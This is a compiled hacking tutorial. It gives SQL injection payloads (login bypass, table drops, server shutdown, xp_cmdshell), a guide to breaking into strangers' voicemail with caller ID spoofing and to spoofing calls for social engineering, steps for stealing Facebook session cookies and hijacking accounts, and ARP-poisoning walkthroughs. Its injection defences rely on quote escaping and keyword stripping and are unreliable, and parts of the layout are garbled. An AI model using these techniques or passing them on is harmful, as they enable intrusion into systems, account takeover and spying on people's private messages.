Power of hacking (part3)

Page 1

Power Of Hacking

SQL Injection:Can you describe, in detail, how to do a SQL Injection? SQL Injection is an attack method that targets the data residing in a database through the firewall that shields it. It attempts to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. Naturally, the first step in this direction should be to uncover any Web applications that are vulnerable to the attack. The attack takes advantage of poor code and Web site administration. In SQL injection, user-controlled data is placed into a SQL query without being validated for correct format or embedded escape strings. It has been known to affect the majority of applications that use a database backend and do not filter variable types. It is estimated that at least 50% of the large e-commerce sites and about 75% of the medium-to-small sites are vulnerable to this attack. The dominant cause is the improper validation in CFML, ASP, JSP, and PHP codes. Attackers go about uncovering susceptible web applications by looking at Web pages for anything resembling an ID number, category, or name. The attacker may sift through all forms of variables, as well as cookies. Many times, session cookies are stored in a database and are passed

Mail:mtahirzahid@yahoo.com

Page 1


Power Of Hacking into SQL queries with little or no format checking. They may try placing various strings into form fields and in query variables. Typically, however, someone looking for SQL vulnerability will start off with single and double quotes and then try with parentheses and other punctuation characters. The response expected is any response signifying an error. (OLE DB Errors) The user-filled fields are enclosed by single quotation marks (‘), so a simple test of the form would be to try using (‘) as the username. If you just enter in a form that is vulnerable to SQL insertion and get OLE Database error, then you can try SQL injections. Example Attackers start by using the single quote in the “User ID” field of the login page. It returned an error just as they wanted it. S QL L I I NJ JE EC CT TI I ON:Error Type ? Microsoft OLE DB Provider for ODBC Drivers (Ox80040E14) ? Microsoft ODBC SQL Server Driver SQL Server Unclosed quotation mark before the character string ‘’’. ? /corner/asp/checklogin1.asp, line 7 Browser Type: ? Mozilla/(version) (compatible; MSIE 6.0; Windows NT 5.0) ? Page #: ? POST 36 bytes to /corner/asp/checkloginl.asp ? POST Data: ? userid=%27&userpwd=%27&Submit=Submit This output is the first lead the attacker can use. He has a greater chance of succeeding if he can find out which database he is pitted against. This process of mapping out the tables on the database is called “database footprinting.”

Mail:mtahirzahid@yahoo.com

Page 2


Power Of Hacking Identifying the configuration of the server is crucial in deciding how the site will be attacked. The method chosen to do this depends on how poorly the server has been configured. In the error statement shown above, it is clear that the site is using a SQL Server. Note that SQL Injection is the attack on the web application, not the Web server or services running in the OS. It is typical of an HTML page to use the POST command to send parameters to another ASP page. On a closer look at the source code, we find the “FORM” tag, <form name=”form1” method=”post” action=”checklogin1.asp”> Let’s examine the implications. Exploits occur due to coding errors and inadequate validation checks. Often, the emphasis is on acquiring an input and delivering a suitable output. Any Web application that does not check the validity of its input is exposed to the attack. Another attack type is Login script. The login page at site.com/login.htm is based on this code: ? <form action=”Checklogin.asp” method=”post”> ? Username: <input type=”text” name=”user_name”><br> ? Password: <input type=”password” name=”pwdpass”><br> ? <input type=”submit”> ? < /form> The above form points to checklogin.asp, where we come across the following code. ? Dim p_struser, p_strpass, objRS, strSQL ? p_struser = Request.Form (“user_name”) ? p_strpass = Request. Form (“pwdpass”) ? strSQL = “SELECT * FROM tblUsers “ & _ “WHERE user_name=’” & p_strusr & _’”and pwdpass=’” & p_strpass & “”’ ? Set objRS = Server. CreateObject(“ADODB.Recordset”) objRS. ? Open strSQL, “DSN=...” ? If (objRS.EOF) Then Response. Write “Invalid login.” ? Else Response. Write “You are logged in as” & objRS(“user_name”) ? End If Set objRS = Nothing

Mail:mtahirzahid@yahoo.com

Page 3


Power Of Hacking At a cursory glance, this code looks alright and does what it is supposed to do—check for a valid username and password, and allow the user to access the site if it the credentials are valid. However, note the above statement where the user input from the form is directly used to build a SQL statement. There is no input validation regarding the nature of input. It gives direct control to an attacker who wants to access the database. For instance, if the attacker enters a SELECT statement such as SELECT * FROM tblUsers WHERE user_name=” or “=” and pwdpass = “ or “=”, the query will be executed and all users from the queried table will be displayed as output. Moreover, the first attacker will be logged in as the first user identified by the first record in the table. It is quite probable that the first user is the superuser or the administrator. Since the form does not check for special characters, such as “=”, the attacker is able to use these to achieve his malicious intent. For the sake of clarity, let’s look at a secure code. Note the use of the REPLACE function to take care of the single quote input. ? < % Else ? strSQL = “SELECT * FROM tblUsers “ _ & ? “WHERE username=”’ & Replace (Request. Form (“usr_name”), “”’, “””) &’” “ _ & ? “AND password=”’” & Replace (Request. Form(“pwdpass”),’””, “””) &’”;” ? Set Login = Server. CreateObject (“ADODB.Connection”) ? Login. Open (“DRIVER= {Microsoft Access Driver (*.mdb)};” _ & ? “DBQ=” & Server.MapPath (“login.mdb”)) ? Set rstLogin = Login. Execute (strSQL) ? If Not rstLogin.EOF then ? %> SQL Server, among other databases, delimits queries with a semi-colon. The use of a semicolon allows multiple queries to be submitted as one batch and executed sequentially. For example, the query Username: ‘or 1=1; drop table users; — will be executed in two parts. First, it will select the username field for all rows in the users table. Next, it will delete the users table.

Mail:mtahirzahid@yahoo.com

Page 4


Power Of Hacking Login Guessing & Insertion is another way of trying to hack. The attacker can try to log in without a password. Typical usernames might be 1=1 or any text within single quotes. The most common problem seen on Microsoft MS - SQL boxes is the default <blank>sa password.

The attacker can try to guess the username on an account by querying for similar user names (e.g., ‘ad%’ is used to query for “admin”), and insert data by appending commands or writing queries. If the attacker has determined that the database backend is SQL server from database fingerprinting, he will try his luck with the default admin login credentials—namely sa and a blank password. Alternatively, he can issue a query so that his query would retrieve a valid username. For instance, to retrieve the administrative account, he can query for users.userName like ‘ad%’ If the attacker does not want to log in and just wants to “harvest” the site, he may try to view extra information which is not otherwise available. He can choose to transform the url, such as the ones shown below, to retrieve information. ? http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools Here, the “sCategory” is the variable name, and “Tools” is the value assigned to the variable. The attacker changes this valid url into: ? http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Kits If the code underlying the page has a segment similar to the one shown below: ? sub_cat = request (“sCategory”) ? sqlstr=”SELECT * FROM product WHERE Category=’” & sub_cat &’”” ? Set rs=conn.execute (sqlstr) Now, the value “Kits” taken in by the variable “sCategory” is attributed to sub_cat and hence the SQL statement becomes: ? SELECT * FROM product WHERE Category=’Kits’ Therefore the output will be a result set containing rows that match the WHERE condition. If the attacker appends the following to the valid url:

Mail:mtahirzahid@yahoo.com

Page 5


Power Of Hacking ? http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools’or1=1— The SQL statement becomes SELECT * FROM product WHERE Category=’Tools’ or 1=1 —’ This leads the query to select everything from the product table regardless of whether Category equals “Tools’ or not. The double dash, “ —”, instructs the SQL Server to ignore the rest of the query. This is done to eliminate the last hanging single quote (‘). Sometimes, it is possible to replace the double dash with a single hash “#”. If the database backend in question is not an SQL Server, it will not recognize the double dash. The attacker can then try appending ‘ or ‘a’=’a, which should return the same result. Depending on the actual SQL query, the various possibilities available to the attacker are: ? ‘or 1=1— ? “or 1=1— ? or1=1— ? ‘ or ‘a’=’a ? “ or “a”=”a ? ‘) or (‘a’=’a To use the database for his malevolent intent, the attacker needs to figure out more than just what database is running at the backend. He has to determine the database structure and tables. Revisiting our product table, we see that the attacker can insert such commands as: insert into Category value (library). Suppose the attacker wants to add a description of the files he wants to upload; he needs to determine the structure of the table. He might be able to accomplish that if error messages are returned from the application according to the default behaviour of ASP and decipher any value that can be read by the account the ASP application is using to connect to the SQL Server. Insertion methods vary according to the database at the backend. For instance, MS SQL is considered to be the easiest system for SQL Insertion. Oracle has no native command execution capability. In Sybase, the Command exec is disabled by default. However, it is similar to MS SQL—although without as many stored procedures. MySQL is very limited in scope. SubSelects

Mail:mtahirzahid@yahoo.com

Page 6


Power Of Hacking are a possibility with newer versions. It is typically restricted to one SQL command per query. One of SQL Server’s most powerful commands is SHUTDOWN WITH NOWAIT, which causes it to shutdown, immediately stopping the Windows service. ? Username: ‘ ; shutdown with nowait; -Password Anything This can happen if the script runs the following query: ? select userName from users where userName=’; shutdown with nowait;-’ and user_Pass=’ ‘ The default installation of SQL Server has the system account (sa), which is accorded all the privileges of the administrator. An attacker who happens to stumble across this account while harvesting websites can take advantage of this to gain access to all commands, delete and rename, and add databases, tables, triggers, and more. One of the attacks he can carry out when he is done with the site is to issue a Denial of Service (DOS) by shutting down the SQL Server. SHUTDOWN WITH NOWAIT is a powerful command, recognized by SQL Server, that causes the server to shut down, immediately stopping the Windows service. After this command is issued, the service must be manually restarted by the administrator. Let’s look at an example. At an input form such as login, which is susceptible to SQL injection, the attacker issues the following command: ? Username: ‘; shutdown with nowait; —Password: Anything ? This would make our login.asp script run the following query: ? select userName from users where userName=”;shutdown with nowait; —’and userPass=” The ‘—’ character sequence is the “single line comment” sequence in Transact -SQL, and the ‘;’ character denotes the end of one query and the beginning of another. If the attacker has used the default sa account, or has acquired the required privileges, the SQL server will shut down, and will require a restart. ? Stored Procedures ? There are several extended stored procedures that can cause permanent damage to a system.

Mail:mtahirzahid@yahoo.com

Page 7


Power Of Hacking ? We can execute an extended stored procedure using our login form with an injected command as the username as follows: ? Username: ‘ ; exec master..xp_xxx; — ? Password: Anything ? Username: ‘ ; exec master..xp_cmdshell ‘ iisreset’ ; — ? Password: Anything A stored procedure is a collection of SQL statements that can be considered as though they were a single function. An SQL stored procedure is similar to a batch file—both are text files consisting of commands, and can be run by invoking the name of the procedure or batch file. An extended stored procedure (XP) takes the notion of a stored procedure one step further. Where stored procedures consist of text files, XPs are written in high languages, such as C, and compiled into .DLLs. Stored procedures primarily consist of SQL commands, while XPs can provide entirely new functions via their code. An attacker can take advantage of extended stored procedure by entering a suitable command. This is possible if there is no proper input validation. Xp_cmdshell is a built-in extended stored procedure that allows the execution of arbitrary command lines. For example: exec master..xp_cmdshell ‘dir’ will obtain a directory listing of the current working directory of the SQL Server process. In this example, the attacker may try entering the following input into a search form that can be used for the attack. ? ‘ exec master..xp_cmdshell ‘product handy cam/DELETE’ — When the query string is parsed and sent to the SQL Server, the server will process the following code: SELECT * FROM PTable WHERE input text =” exec master..xp_cmdshell ‘ product ? handycam/DELETE’ —’ The advantage of this attack method is that the DLL file only needs to be present on a machine accessible by the SQL Server. Here, the first single quote entered by the user closes the string and SQL Server executes the next SQL statements in the batch, including a command to delete a

Mail:mtahirzahid@yahoo.com

Page 8


Power Of Hacking product to the product table in the database. Server Talks This command uses the ‘speech.voicetext’ object, causing the SQL Server to speak: ? admin’; declare @o int, @ret ? int exec sp_oacreate ? ‘speech.voicetext’, @o, ? ‘register’, NULL,’foo’, ? ‘bar’ exec sp_oasetproperty ? @o, ‘speed’,150 exec ? sp_oamethod @o, ‘speak’, ? NULL, ‘all your sequel ? servers are belong to us’, ? 528 waitfor delay ‘00:00:05’— It is possible for an attacker to leverage built-in extended stored procedures provided for the creation of ActiveX Automation scripts in SQL server. These scripts are typically written in VBScript or JavaScript, and they create and interact with automation objects. They are functionally similar to ASP scripts. Similarly, an automation script written in Transact-SQL can accomplish what an ASP script or a WSH script will do. Example 2 ? declare @o int, @ret int ? exec sp_oacreate ‘speech.voicetext’, @o out ? exec sp_oamethod @o, ‘register’, NULL, ‘foo’, ‘bar’ ? exec sp_oasetproperty @o, ‘speed’, 150 ? exec sp_oamethod @o, ‘speak’, NULL, ‘all your sequel servers belong to us’, 528 ? waitfor delay ‘00:00:05’ This uses the ‘speech.voicetext’ object, causing the SQL Server to speak. Preventing Attacks

Mail:mtahirzahid@yahoo.com

Page 9


Power Of Hacking “Minimize Privileges of Database Connection!” “Disable verbose error messages!” “Protect the system account ‘sa’!” “Audit Source Code!” “Escape Single Quotes!” “Allow only good input!” “Reject known bad input!” “Restrict length of input!” And finally, “Update the database, and back it up!!!” The majority of injection attacks require the user of single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you’re greatly reducing the chance of an injection attack succeeding. Using ASP, it’s a simple matter of creating a generic replace function that will handle the single quotes automatically, like this: ? function stripQuotes(strWords) <br /> ? stripQuotes = replace (strWords, “‘“, “”” ;) <br /> ? end function Now, if you use the stripQuotes function in conjunction with our first query, for example, then it would go from this: ? select count(*) from users where userName=’alice’ and ? userPass=” or 1=1 —’ ...to this: ? select count(*) from users where userName=’alice’ and ? userPass=”’ or 1=1 —’ This, in effect, stops the injection attack from taking place, because the clause for the WHERE query now requires both the userName and userPass fields to be valid. One countermeasure would be to: Remove Culprit Characters/Character Sequences. Certain characters and character sequences, such as, —, select, insert and xp_, can be used to perform an SQL injection attack. By removing these characters and character sequences from user input before we build a query, we can help reduce the chance of an injection attack even further. As with the single quote solution, we just need a basic function to handle this: ? function killChars(strWords)

Mail:mtahirzahid@yahoo.com

Page 10


Power Of Hacking ? dim badChars ? dim newChars ? badChars = array(“select”, “drop”,”;”,”—”, “insert”, ? “ delete”, “xp_”) ? newChars = strWords ? for i = o to uBound(badChars) ? newChars = replace(newChars, badChars(i),””) ? next ? killChars = newChars ? end function Using stripQuotes in combination with killChars greatly removes the chance of any SQL injection attack from succeeding. So if the query: ? select prodName from products where id=1; xp_cmdshell ‘format ? c: /q /yes ‘; drop database targetDB ? —is run through stripQuotes and then killChars, it would end up looking like this: ? prodName from products where id=1 cmdshell “format c: ? /q /yes “ database targetDB This is basically useless, and will return no records from the query. By keeping all text boxes and form fields as short as possible, the number of characters that can be used to formulate an SQL injection attack is greatly reduced. Additional countermeasures include checking data type and using the post method, where possible, to post forms. Conclusion SQL Injection is an attack methodology that targets the data residing in a database through the firewall that shields it. It attempts to modify the parameters of a Web-based application in order to alter the SQL statements parsed to retrieve data from the database. Database footprinting is the process of mapping out the tables on the database, and is a crucial tool in the hands of an attacker. Exploits occur due to coding errors, as well as inadequate vali-

Mail:mtahirzahid@yahoo.com

Page 11


Power Of Hacking dation checks. Prevention involves enforcing better coding practices and database administration procedures. You have finally read this article, and I hope it gave you a deeper understanding about today’s state of Web security and attacks. Remember: always patch and update holes, because these and other exploits are common, and attackers are not going to wait. Thank you all for reading and continue to show your support to Hackers Centre by spreading good word about our site! Hacking Cell Phone Voicemails:Is hacking a cell phone harder than hacking a computer? Hacking someone else’s cell phone voicemail is the easiest hacking you will ever attempt. You don’t even have to be a hacker! What hardware or software do I need? You don’t need a computer or software. You don’t need to know anything about computers. All you need is a caller ID spoofing account from a company like SPOOFEM.COM. What is caller ID spoofing? Caller ID spoofing allows you to call any number and have any number show up in the person’s caller ID. For example, you can call someone who is on vacation and have their home phone number show up in their cell phone caller ID. How do I hack a voicemail box? When you check your voicemail from your cell phone, it calls your cell phone carrier’s network, which recognizes your phone and puts you into your voicemail if your cell phone is set up so that you do not need to enter a passcode when calling from your cell phone. Believe it it not, there are over eighty million people in the United States that do not have the passcode turned on when they call from their cell phone. Does it work with any kind of phone? It is not the type of phone you have, but your cell phone carrier. It has been tested with Sprint, Nextel, Verizon, T-Mobile and AT&T Wireless—and tt even works perfectly with Apple’s iPhone!

Mail:mtahirzahid@yahoo.com

Page 12


Power Of Hacking When you set up your voicemail on your iPhone, you do not have to call into the cell phone network. The iPhone asks you two simple questions when you first configure it. The first, when you record your greeting, is, “What do you want your passcode to be?” The iPhone never gives you the option to turn on your passcode when checking voicemail on itself; that’s because it uses Visual Voicemail, so it is always checking with the carrier to see if there are any messages on the carrier’s network. Are there any keys I need to press? Yes…and no. Some carriers will put you right into voicemail. Others may require you to hit the “*” or “#” key. I tried that, but the person keeps picking up the phone. What happened? It only works if the person does not answer the phone. If someone picks up the phone, it is not sending you to voicemail, so it is best to try it when the person is least likely to answer. Good times to try are when you know the person is asleep, at the movies, in church or at work, and is not using the phone. Please note that when you call someone and put their cell phone number in the caller ID, they will be suspicious and will most likely answer the phone. If they do, hang up so they will not know it was you calling. What is the best service for this? My favorite caller ID spoofing service is SPOOFEM.COM—not because I own the company, but because it is the easiest service, with the most features. You can record a conversation, which I recommend you do if you are checking a person’s voicemail. That way, you do not need to keep listening to the messages over and over. What else can I use a telephone spoofing service for? Caller ID spoofing is perfect when performing Social Engineering. You can call someone within a company and use their caller ID to make it look like the call is coming from within the company. For example, you could call Accounting and have the IT department number show up in the caller ID. You could then use your Social Engineering skills to get the information you are look-

Mail:mtahirzahid@yahoo.com

Page 13


Power Of Hacking ing for. How to Become a Hacker in Fifteen Minutes How to become a hacker in 15 minutes With the explosion of web develpope languages such as Java, Ajaz, and .php have allowed developers to create all the security tools you would need to perform a penetration test right from a web site. ? One website www.LIGATT.com offers LIGATT Security Suites that can perform: ? Port Scan / Vulnerbility check ? Spoof emails to get someones IP address ? Caller ID spoofing ? Pentration testing ? Set up trip wires ? Monitor a IP address ? And more. The following tools on “How to become a hacker in 15 minutes,” are part of LIGATT Security Suites. Step One, get the persons IP Address. IPSNITCH is two powerful programs in one. The first powerful program is email spoofing. This allows you to send an email to anyone you like and make it appear to have come from someone else. The second powerful program allows you to get anyone’s IP address. With IPSNITCH all you need is an email address of the person in which you are targeting. IPSNITCH lets you send that

Mail:mtahirzahid@yahoo.com

Page 14


Power Of Hacking person an email making the email look like it came from someone else. When a person opens

the email, it will automatically send you the person’s personal IP address and the ISP that owns the IP address. You will be prompted to log into the page. This login page is the same as the IP Snitch and Port Snitch. When you are logging in make sure that you click the Tattle Tell radio button. Once your are logged into IP Snitch you will be prompted with a screen

like the one below. Your next step is to click the Add Target button. Then you will be given a new screen like thefigure: There you will fill in all the information. Notify Email – This will be the email that you want the response to come too Mail:mtahirzahid@yahoo.com

Page 15


Power Of Hacking From – This will be the fictitious email address from the pull-down menu Or Type Your Own – This is the user defined email address that you want to use if none of the other from the dropdown box are to your satisfaction. Choose a Subject – Choose a predefined subject from the dropdown box Subject – user defined subject box Message box – This is where the user will type his/her message – Max characters is 500

Then you will submit your email. Once you hit submit you will be redirected back to the main page. You will see that you main page now looks like figure 1.4, which will show a status message of waiting for response. This will not change until the receiver

responds to the email. When you log back in to check to see if the receiver has responded to the email please check the box for the specific Targeted email Mail:mtahirzahid@yahoo.com

Page 16


Power Of Hacking and click the refresh in the dropdown menu also you may continue to check the response email. At that point if the user has responded to the email it will give you a date and time that the email was actually replied too. Next you must log back into IP Snitch select the Targeted email you wish you gain information on. Go to the dropdown menu and purchase

report. Your next step will be to select the report you want and then select view map from the dropdown menu. Then

you will receive the Map view of the

general location of that IP Address. Background check and Vulnerbility check all in one! Here you will have the option to do a port scan. If you have a personal account, you can only Mail:mtahirzahid@yahoo.com

Page 17


Power Of Hacking scan your own IP address. If you have a business account, you can input any IP address of your choice. The IP address is the only field that is required. You can also fill out your or the Targets first name, last name, company, address, city, state, country, zip code, phone number and e-mail address. Hit Start Scan button to proceed with scan.

Once you submit the proper information, the computer will be scanned. The page will refresh every 3 seconds giving you an update on your scan status. When the targets computer is being scanned, Port Snitch will look for any potential vulnerabilities on that specific IP address. If no vulnerabilities are found you will not have to pay for a report. If vulnerabilities are found, a summary of what is found will be displayed on the screen. You will be prompted to purchase the report. This report will give detailed information about all of the vulnerabilities on your targets computer and also any personal information for on the

Mail:mtahirzahid@yahoo.com

Page 18


Power Of Hacking web, videos, books, blogs, and news articles.

If you chose to purchase this, will can either put in a promotional code (if this applies to you) or click the purchase report button. This will send you over to a payment screen to make payment or it will deduct it from your LIGATT Security EZPAY Account. Once you have made a payment a report will be e-mailed to you along with it being available to you when you log into port snitch. This report

Mail:mtahirzahid@yahoo.com

Page 19


Power Of Hacking

will be available online for 7 days. return to the home page,

When you

all of the reports you have purchased will appear at the bottom of the page. Here you can click on the link to view them or click the check mark to delete the report.

Mail:mtahirzahid@yahoo.com

Page 20


Power Of Hacking

You’re done.

Mail:mtahirzahid@yahoo.com

Page 21


Power Of Hacking

PC211 is a online penetration testing program. It will use the scan reports from PortSnitch and then try to exploit (hack) into all the vulnerabilities that were located in the report. By the way, Once you have logged into the LIGATT Security Suites click on the “PC211” logo. Here you will see the PC211 home page. Listed are all of your purchased reports from PORTSNITCH. To execute a PC211 penetration test, simply check one of the reports that you would like to you and click on the “PC211” option under the “Select an

Mail:mtahirzahid@yahoo.com

Page 22


Power Of Hacking

option” menu. “PC211”, the

Once you have clicked

penetration test will begin. Here you will see a map of the target and also the status of the penetration test. As you wait, there are some YouTube videos dealing with cyberstalking, spyware, wireless hacking, and plenty of other subjects dealing with network security. If PC211 was able to gain access on your computer, PC211 will leave a file named “LIGATT_SECURITY.txt” on the root directory of you hard drive. This file will state: “PC211 has broke and entered into your machine. IP

Mail:mtahirzahid@yahoo.com

Page 23


Power Of Hacking Address XX.XX.XX.XX.�

When the penetration test is complete, PC211 will display the results onto the screen letting the user know if the system was penetrated or not.

7. You are done. to launch PC211

If you decide

directly from PORTSNITCH, some of the instructions will be slightly modified. Once you log into the LIGATT Security Suites, click on the “PORT-

Mail:mtahirzahid@yahoo.com

Page 24


Power Of Hacking

SNITCH” logo. test is com-

When the penetration

plete, PC211 will display the results onto the screen letting the user know if the system was penetrated or not.

6. You are done. Sniffing with Wireshark If you have read the “Network Sniffing” chapter (Chapter 6), you would have seen Wireshark in action, where I demonstrated the TCP/IP three-way handshake and how port scanning works. Wireshark, previously known as Ethereal, is one of the best packet sniffers ever. It’s not only used by hackers and penetration testers, but also by network administrators to sort out problems within a network. Since Wireshark is an extensive tool, it’s not possible for me to cover every aspect of this tool in this chapter; however, I will give a quick overview. We will use Wireshark to capture plain text passwords sent across the wire. So let us begin: Mail:mtahirzahid@yahoo.com

Page 25


Power Of Hacking Step 1—Launch Wireshark by executing “Wireshark” command from the terminal. Once launched, click on the “Capture” button at the top and click on the “Analyze” button. Step 2—Next, select the interface you would like to sniff on and click “Start”; in my case, it is eth0.

Step 3—Wireshark will start capturing all the packets going across the network. On the victim’s machine. I will log into a website that supports http authentication and will stop the capture on my attacker machine once I have logged in. Step 4—Since we have so many packets, we need to ask Wireshark to filter out only HTTP POST requests. So, inside of the filter tab, we will type “http.request.method==POST.”

The first request you see is a “POST” request performed to the destination 75.98.17.25 from our victim, which has a source IP 192.168.75.142. Step 5—Next, we will right-click on the packet and click on “Follow tcp stream,” which will show us the original post request generated from the victim’s browser. The output would

Mail:mtahirzahid@yahoo.com

Page 26


Power Of Hacking look something like the following:

As you can see, the POST request contains the username “admin” and the password “pass.” There are many different types of filters in Wireshark used to filter out different types of traffic. We have already discussed some of them. Personally, I would suggest you to take a look at the Wireshark manual available at wireshark.org. Sniffing Session Cookies with Wireshark:Our next goal is to capture the session cookies of the victim so we can hijack his/her session. Every site has its own session cookie that it uses to authenticate a user. For demonstration purposes, I will capture the session cookies of Facebook, which are c _ user and xs. Note: If the victim has logged out of his/her Facebook account, you will not be able to use the session cookies, since session cookies expire upon logging out. I have already walked you through the process of how to start a packet capture inside Wireshark, so I won’t do it again. What we will do inside Wireshark is that we apply a filter to filter out all the HTTP cookies containing the word “c _ user” or “xs”, since they are the session cookies. If you can’t find them, I would suggest that you use http.cookie and then manually check for the cookies.

So we have filtered all the HTTP requests containing the cookies named “c _ user.” Let’s try to inspect the first request. On inspecting the HTTP request, we find all the cookies associated Mail:mtahirzahid@yahoo.com

Page 27


Power Of Hacking with Facebook.

To get a clear view of all the cookies, we will right-click on the cookie field and then to Copy → Bytes → Copy printable text only. Now, all the cookies will be selected. We will delete the other cookies and will save only the authentication cookies.

Hijacking the Session Now that we have the authentication cookies of the victim, we would need to inject these cookies in our browser to hijack the session. Personally, I prefer the “Cookie Manager” plug-in inside of Firefox. It’s very simple to use. Step 1—To inject our cookies, we will browse facebook.com, and from our tools menu, will select the “Cookie manager” plug-in. Step 2—Once the plug-in is launched, we would need to inject our cookies. We will click on the “Add” button at the bottom and will add both of our cookies. Here is an example.

Step 3—Once both of our cookies are injected, we will just refresh the page, and we will be

Mail:mtahirzahid@yahoo.com

Page 28


Power Of Hacking logged in to our victim’s account.

Sniffing Pictures with Drifnet:If we want to see what the victim is viewing in his browser, we have a great tool called “driftnet,” which comes preinstalled with BackTrack. We can use it to capture all the images that victim is browsing through. We can do it by executing the following command:

root@bt:~# driftnet –v output will be like: we can clearly see that the victim is browsing google.com.

This is what the

The “facebook hacked” image is basically from my blog, since I accessed my blog from the victim’s browser to demonstrate this tool. Urlsnarf and Webspy:Urlsnarf and webspy is part of the dsniff toolset; urlsnarf tells us about the URL that the victim has visited, whereas the webspy tool will open up all the web pages that the victim has visited in our

Mail:mtahirzahid@yahoo.com

Page 29


Power Of Hacking browser.

An example of attacker running urlsnarf to sniff the URLs that victim has visited. The websnarf works the same way; however, we need to specify additional arguments. Here is how the command would look like: root@bt:~# webspy –i eth0 192.168.75.142 where eth0 is the interface and 192.168.75.142 is the IP address of the victim.

As urlsnarf keeps track of the URL’s visited by the victim, as soon as the victims connects to a new url using his browser or browser would automatically connect to it too, we would know what pages the victim is curently on. As you can see from the above screenshot, the victim (on his machine) has connected to facebook.com and our browser has automatically opened up Facebook. Types of Sniffing Sniffing can be primarily divided into two main categories: 1. Active sniffing 2. Passive sniffing Active Sniffing Active sniffing is where we directly interact with our target machine, by sending packets and Mail:mtahirzahid@yahoo.com

Page 30


Power Of Hacking requests. ARP spoofing and MAC flooding are common examples. Active sniffing is what we will focus more on. Passive Sniffing In passive sniffing, the attacker does not interact with the target. They just sit on the network and capture the packets sent and received by the network. This happens in the case of hub-based net-

works or wireless networks. ARP Poisoning with Ettercap Let’s start by performing an ARP poisoning attack with Ettercap. Just follow these steps: Step 1—Launch ettercap by executing the following command: root@bt:#ettercap –G Step 2—Next, click on the “Sniff” button at the top and then “Unsniffed bridging” and finally

select your appropriate interface. 3—Next, click on “Host List” at the top and click on “Scan for host.” It will scan the whole

Mail:mtahirzahid@yahoo.com

Step

Page 31


Power Of Hacking network for all live hosts.

Step 4—Once the scan is complete, from the hosts menu, click on “Hosts List.” It will display all the hosts that it has found within your network.

Step 5—Next, we need to choose our targets. In this case, I would like to perform sniffing between my victim host running Windows XP machine on 192.168.75.142 and our default gateway 192.168.75.2. We will add 192.168.75.142 to target 1 and add 192.168.75.2 to target 2. Step 6—Next click on the “MITM” tab at the top and click on “ARP Poisoning” and then click

“Ok” to launch the attack. 7—From the following screenshot, you can see that we are capturing all the traffic going

Mail:mtahirzahid@yahoo.com

Step

Page 32


Power Of Hacking to and from the default gateway and the victim.

Step 8—Finally click on “Start sniffing,” and it will start sniffing the traffic. We can check if ARP cache has been successfully poisoned by using the “chk _ poison” plug-in from Ettercap. To use this plug-in, click on the plug-ins menu at the top, and it will display several plug-ins:

Just double-click on the “chk _ poison” plug-in, and it will tell you if poison is successful.

It will show you the following output: Wireshark to capture all the traffic between the victim’s machine and the

Next, we can use

default gateway like we did earlier. We can also launch a denial-of-service attack, which I talked about earlier, by using the “dos _ attack” plug-in. Another interesting plug-in is “auto _ add,” which will automatically add any new targets it finds on your network. Hijacking Session with MITM Attack So far, we have utilized MITM attacks only to capture the plain text passwords, However, we can also use it to steal session tokens/cookies, which are responsible for authenticating a user on a website. We should understand that this attack would only work where the communication is performed via http or full end-to-end encryption is not enabled. It won’t work where communications are encrypted (https). Attack Scenario Mail:mtahirzahid@yahoo.com

Page 33


Power Of Hacking Since we will use ARP spoofing to get in the middle of the communication, this attack would work only when the attacker and victim are on the same local area network. It could be that an attacker has compromised a target, and by using it, he is able to sniff the traffic of computers on the local area network of the compromised box; it could be in a coffee shop where the attacker and the victim are already on the same local area network; or it could be that the attacker has physically plugged in a laptop to the same local area network. The attack we will perform is divided into three parts: Part 1—We will use Cain and Abel to perform an ARP spoofing attack. Cain and Abel is a Windows-based tool that is most commonly used as a password cracker and to implement an ARP spoofing network. Part 2—Once we have successfully ARP-poisoned the network, all the victim’s traffic would be directed to us. We will open our favorite “packet capturing” tool, namely, “Wireshark,” to capture all the traffic. We will specifically look for the victim’s cookies to hijack the session. Part 3—Finally, we will use a cookie injector to inject cookies in our browser so that we can take over the victim’s session. ARP Poisoning with Cain and Abel:So let me walk you through the process of ARP poisoning a network with Cain and Abel. For the simplicity, I have divided the process into five steps: Step 1—Download “Cain and Abel” from the following link, install it, and launch it. http://oxid.it/cain.html Step 2—Turn on the sniffer by clicking on the green button at the top just above the decoder tab. Next, scan for the MAC addresses by clicking on the plus sign (+) at the top. This will bring us all the hosts inside our subnet. Alternatively, you can also define your own range

Mail:mtahirzahid@yahoo.com

Page 34


Power Of Hacking and set your targets.

Step 3—Once you have scanned all the MAC addresses and IP addresses, it’s time to perform an ARP spoofing attack. To do that, click on the “APR” tab at the bottom and then click on the white area in the top frame. This will turn the “+” sign into blue color.

Step 4—Next click on the “+” sign; lists of hosts will appear. Select the hosts that you want to intercept the traffic between. In my case, at the left side would be my default gateway and on the right would be my victim hosts.

Step 5—Click “Ok” and then finally click on the yellow button just under the file menu. And it Mail:mtahirzahid@yahoo.com

Page 35


Power Of Hacking will begin poisoning the routes in a short span of time and you will start to see traffic being captured by Cain and Abel.

Wireless Hacking:Requirements ◾Wireless access point ◾Wireless adapter supporting packet injection These two things are all we require for replicating what’s being discussed in this chapter. The access point is required because we don’t want to attack the neighbor’s access point, because it would be unethical, and as a penetration tester or an ethical hacker, you should make sure that you follow ethics. The second and the most important requirement is a wireless adapter that supports packet injection and is also able to sniff in the monitor mode. Personally, I use the Alfa AWUS036H wireless adapter; it not only supports packet injection, but also BackTrack has preinstalled drivers

Mail:mtahirzahid@yahoo.com

Page 36


Power Of Hacking of it, so we don’t have to do the tedious job of downloading and installing them.

Once you have an Alfa network adapter that supports packet injection and has all drivers installed, you can connect the adapter to your computer, and since we are running BackTrack from our virtual machine, we need to attach the network adapter to our BackTrack machine. This can be done by going into Vm → Removable Devices → Realtek RTL8187_Wireless and clicking the “Connect(Disconnect from HOST)” option.

Next, we will execute “iwconfig” command to confirm that our BackTrack machine has been able to detect our network adapter.

Our BackTrack machine has managed to detect our wireless network adapter; however, as we can see, it is not associated with any access point. We could use WICD network manager from

Mail:mtahirzahid@yahoo.com

Page 37


Power Of Hacking Application → Internet → Wicd Network Manager to check available wireless networks.

Once we have connected to the appropriate access point and executed “iwconfig”, we will see that the wlan0 interface contains information regarding ESSID, MAC address, etc.

